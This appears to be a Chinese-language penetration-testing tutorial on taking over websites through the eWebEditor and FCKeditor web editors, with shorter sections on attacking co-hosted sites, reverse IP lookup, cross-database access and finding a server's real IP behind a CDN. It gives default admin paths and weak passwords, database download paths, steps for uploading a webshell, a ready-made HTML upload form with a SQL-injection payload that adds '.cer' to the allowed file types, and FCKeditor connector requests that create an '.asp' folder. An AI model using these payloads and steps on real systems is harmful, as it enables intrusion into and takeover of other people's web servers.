一.本文介绍

1、本文介绍Ewebeditor常识、获取webshell、fckeditor获取webshell、旁注原理、ip逆向查询、目录越权及跨库查询、cdn绕过。

---

二.学习步骤

1、Ewebeditor常识：

默认后台：xxxx.com/ewebeditor/admin_login.asp

数据库地址：ewebeditor/db/ewebeditor.mdb

帐号：admin     密码：admin/admin888/admin000(各种弱口令)

常用数据库路径为:

ewebeditor/db/ewebeditor.asa

ewebeditor/db/ewebeditor.asp

ewebeditor/db/#ewebeditor.asa

ewebeditor/db/#ewebeditor.mdb

ewebeditor/db/ewebeditor.mdb

ewebeditor/db/!@#ewebeditor.asp

ewebeditor/db/ewebeditor1033.mdb 等

2、Ewebeditor后台获取webshell

1. http://IP/admin_login.asp：账号：admin 密码：admin，然后添加样式，在样式的图片格式中加入cer或asp等；最后添加工具栏：插入或修改图片

2. 工具栏添加好后点击“预览”，上传在样式的图片格式中加入cer或asp等，我上传的是shell.cer，然后在代码的地方可以看到URL，然后菜刀连接即可。

3. 在id=14后面加上&dir=../，发现没有起作用，那就是2.1.6这个版本不存在这个漏洞。换成2.8.0。2.8.0存在这个文件遍历漏洞。

4. 在下载的数据库中看eWebEditor_style表中的S_ImageExt字段是否有被人添加过什么。

5. 使用下面的语句进入突破:

ewebeditor.asp?ID=xx&style=yy  其中的id=xx就是被修改过的那条记录的id，而yy就是S_name字段的名字。

3、Ewebeditor文件上传实验

将代码新建为html：
<form action="http:/IP/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">

<input type=file name=uploadfile size=100><br><br>

<input type=submit value=Fuck>

</form>

创建完直接打开，点击上传按钮将马上传，右键查看源代码：

默认文件上传保存的路径为ewebiditor/uploadfile，访问：http://IP/uploadfile/2020417145621756.cer，输入马的密码：

4、fckeditor获取webshell

1.查看编辑器版本

FCKeditor/_whatsnew.html

2.FCKeditor编辑器页
FCKeditor/_samples/default.html

3.常用上传地址

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

2.5的版本下面这条语句能用：

http://192.168.87.129:8234//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

若出现：

根据提示，需要：
开启文件上传功能,把\editor\filemanager\connectors\asp\config.asp文件中的

DimConfigIsEnabled

ConfigIsEnabled = False

设置成功true。

手工新建：

/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=fendo.asp

原因：

CurrentFolder：当前文件夹 未进行过滤(这个文件夹下的没有过滤)

NewFolderName：新建文件名 进行了过滤

添加敏感文件夹 敏感目录 登录即可获取shell

5、旁注原理

主站不存在漏洞，通过同服务器的其它站点存在的漏洞，进而获取整个服务器网站的权限，进行控制。

6、ip逆向查询

可通过ping 域名获取其相关IP地址，之后通过IP地址反查获取其旁注的域名。

相关网址：

http://tool.chinaz.com/Same/

http://dns.aizhan.com/

http://www.11best.com/ip/

7、目录越权及跨库查询

目录越权：访问本来没有权限访问的路径。

跨库查询：是指由于权限设置不严格，导致普通帐号被授予过高的权限，从而使得其可以对其他的数据库进行操作。比如，在mysql中，informatin_schema

这个表默认只有root有权限进行操作。但是如果一个普通账户权限过高后，他便可以对该数据库进行操作，从而影响整个mysql数据库的运行。
sqlmap里面使用“—current-代表”进行判断当前库是哪个。Mysql的root、mssql的sa、oracle的sys 分别是其数据库中权限最大的账户。

8、cdn绕过

1.利用SecurityTrails平台

2. 二级域名或泛解析ping

3.nslookup

4. https://dnsdb.io/zh-cn/ ###DNS查询

https://x.threatbook.cn/ ###微步在线http://toolbar.netcraft.com/site_report?url= ###在线域名信息查询http://viewdns.info/ ###DNS、IP等查询

https://tools.ipip.net/cdn.php ###CDN查询IP